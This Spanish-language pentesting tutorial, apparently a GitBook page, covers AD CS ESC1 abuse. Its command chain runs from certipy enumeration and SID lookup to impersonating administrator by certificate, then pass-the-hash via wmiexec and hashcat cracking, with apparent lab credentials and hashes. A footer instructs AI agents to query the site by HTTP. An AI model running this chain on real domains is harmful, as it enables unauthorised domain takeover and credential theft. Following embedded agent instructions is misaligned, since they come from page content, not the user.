# ADCS

**AD CS (Active Directory Certificate Services)** es el servicio de Microsoft que gestiona **PKI (Public Key Infrastructure)** en dominios Active Directory.

#### Paso 1: Encontrar ESC

Usuario + Hash

```
certypy-ad find -u 'usuario@dominio' -hashes HASH -dc-ip <IP> -enabled -vuln -ldap-scheme ldap -stdout
```

<figure><img src="/files/3VVfA7psGC4aOFtC1Vj1" alt=""><figcaption></figcaption></figure>

Usuario + Contraseña

```
certipy-ad find -u 'usuario@dominio' -p 'password' -dc-ip <IP> -enabled -vuln -ldap-scheme ldap -stdout
```

<figure><img src="/files/firwYEJL61p0Quv3NZMJ" alt=""><figcaption></figcaption></figure>

#### Paso 2: Explotar en función del ESC

**ESC1 - Template con SAN + Auto-Enroll**

Se basa en **Suplantar identidades con certificados**

<figure><img src="/files/Zr12dZg5NXa7wipEbsOA" alt=""><figcaption></figcaption></figure>

Antes de nada, debemos enumerar el SID del usuario que queremos suplantar:

Manera 1: impacket-lookupsid

```
lookupsid.py 'DOMINIO/USUARIO:PASSWORD@IP_DC'
```

<figure><img src="/files/pqJn5hXqgNcq7Pe2MXrd" alt=""><figcaption></figcaption></figure>

Manera 2: Aprovechando RPC

```
rpcclient --user 'DOMINIO/USUARIO' --password 'PASSWORD' <IP> -c "lookupnames administrator"
```

<figure><img src="/files/hKxBBQ2uElyMStzo1tlR" alt=""><figcaption></figcaption></figure>

Ahora sí pasamos a la explotación.

```
certipy-ad req -debug -u 'USUARIO@DOMINIO.COM' -p 'CONTRASEÑA' -hashes 'LM_HASH:NTLM_HASH' -target-ip IP_CA -ca 'NOMBRE_CA' -template 'TEMPLATE_VULNERABLE' -upn 'USUARIO_A_SUPLANTAR@DOMINIO.COM' -sid 'SID_COMPLETO_USUARIO_A_SUPLANTAR'
```

Ejemplo:

```
certipy-ad -debug req -u 'tel_engineer01@telecore.ad' -p 'e2b1996aaff0f57bccb916265a77970e' -hashes 'aad3b435b51404eeaad3b435b51404ee:e2b1996aaff0f57bccb916265a77970e' -target-ip 10.5.2.8 -ca 'telecore-PKI-SRV-CA' -template 'Tel_User' -upn 'administrator@telecore.ad' -sid 'S-1-5-21-1588247407-410625039-1511794522-500'
```

<figure><img src="/files/ESheOdDiAh0rBZCIIhWa" alt=""><figcaption></figcaption></figure>

Ahora uso el certificado administrator.pfx para obtener un TGT de Kerberos y autenticarme como Administrator.

<figure><img src="/files/QN8cwqfQsQo2ZoPR1jIT" alt=""><figcaption></figcaption></figure>

```
impacket-wmiexec -hashes :HASH 'administrator@IP'
```

<figure><img src="/files/sapjwkbAvhUfOGsOBWw6" alt=""><figcaption></figcaption></figure>

Para crackear ese hash:

```
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/RtL4QcSwJI9dnhC0iwNF" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alv-fh.gitbook.io/alv-fh/windows-privilege-escalation/adcs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.